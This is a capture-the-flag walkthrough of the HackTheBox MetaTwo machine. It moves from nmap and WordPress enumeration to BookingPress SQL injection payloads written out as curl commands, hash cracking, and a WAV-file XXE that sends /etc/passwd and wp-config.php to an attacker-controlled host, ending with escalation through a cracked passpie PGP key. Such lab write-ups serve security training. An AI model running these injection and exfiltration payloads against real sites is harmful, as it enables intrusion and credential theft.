8.2 KiB
HackTheBox Meta-Two
NMAP
Nmap scan report for metapress.htb (10.10.11.186)
Host is up (0.13s latency).
Not shown: 947 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
| 256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_ 256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.6.2
|_http-title: MetaPress – Official company site
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
PORT 80
Visting the webserver, it redirects to metapress.htb
Adding the domain name in /etc/hosts file
From wappalyzer, it seems that it's using wordpress version 5.6.2
So running wpscan against the url
wpscan --url http://metapress.htb/
It only returned the version which we already knew but didn't found any plugins, searching for CVEs related to wordpress, it shows sql injection via WP_QUERY in wordpress version till 5.8.2 which means this version might be vulnerable as well but it didn't worked
There was another CVE specifically for this version but it was an authenticated XXE so probably we'll need to login
Enumerating site by going to `/events` and viewing the source, will show a plugin named `booking press` being used, not sure why wpscan didn't find it
And this plugin has an un aunthenticated sql injection exploit
We just only need the nonce which we can get the from view source
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=ef5a981727&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
We can manully dump the data by first enumerating the table names
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from information_schema.tables where table_schema=database()-- -'
Foothold
Now we need to get the column names for wp_users because that's the table where wordpress saves user credentials but when I tried dumping the column names for some reason it wasn't working
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(column_name),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from information_schema.columns where table_name=wp_users-- -'
But we don't have to worry about getting column names as it's wordpress so we can google for columns for wp_users table
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login,user_pass),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
Cracking the hashes with hashcat, we'll get manager's hash cracked with the password partylikearockstar
hashcat -a 0 -m 400 ./hash.txt /usr/share/wordlists/rockyou.txt --force
With these credentials we can login into the dashboard of wordpress but there's nothing much we could do with this user
Looking back at the authenticated XXE, we can try that
We need to generate a malicious wav file which will perform an out of band or blind XXE attack by fetching the dtd from our server which is going to read the /etc/passwd file and present the output to us
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.13:2222/?p=%file;'>" >
const fs = require('fs');
const wavefile = require('wavefile');
let wav = new wavefile.WaveFile();
wav.fromScratch(1, 44100, '32', [0, -2147483, 2147483, 4]);
wav.setiXML('<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM \'http://10.10.14.13:2222/uwu.dtd\'>%remote;%init;%trick;]>');
fs.writeFileSync('malicious.wav', wav.toBuffer());
Before running the script, make sure install wavefile npm package with npm -i wavefile
Simply upload the malicious.wav file through Media Library option and check the listener
Decoding the base64 file contents we'll get /etc/password from the target machine
Now reading wp-config.php which should one directory back
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.13:2222/?p=%file;'>" >
With these credentials we can login to ftp
By going into mailer directoy, there's send_mail.php from where we can find jnelson's password and login through ssh
Running sudo -l we see that this user isn't in sudeors group
Privilege Escalation
Checking the files which are owned by jnelson group, we see few files related to passpie which is a command line manager
Here we'll see the pgp message that is encrypted
We'll also find the pgp private key from /home/.passpie/keys
To crack the pgp message we need to know the password of the private key so that we can import it and do that we can use gpg2john
/usr/sbin/gpg2john ./private.key > private_hash
john --wordlist=/usr/share/wordlists/rockyou.txt private_hash
With the password blink182 we can import the private key
Which might be the password for root user, so switching to root user
We can export passwords from passpie as well with export option by specifying the private key password and the path where we want to save the file
